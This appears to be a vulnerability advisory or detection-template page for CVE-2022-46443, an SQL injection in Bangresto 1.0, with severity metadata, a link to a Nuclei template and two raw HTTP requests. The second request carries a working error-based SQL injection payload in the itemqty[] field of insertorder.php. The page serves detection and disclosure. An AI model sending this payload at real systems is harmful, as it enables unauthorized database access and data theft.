| Title | Bangresto - SQL Injection |
|---|---|
| Author | Harsh |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and underlying database. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 8.8 |
| EPSS Score | 0.81782 |
| CVE ID | CVE-2022-46443 |
| CWE ID | CWE-89 |
| Tags | cve cve2022 bangresto sqli bangresto_project vuln |
Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.
POST /bangresto-main/staff/process.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Connection: close
Content-Length: 31
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
username=zu9Bel&password=YXEQWv
POST /bangresto-main/staff/insertorder.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/9.0
Connection: close
Content-Length: 186
Content-Type: application/x-www-form-urlencoded;
Accept-Encoding: gzip
itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5(4903),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-46443.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-46443.pcap
N/AN/A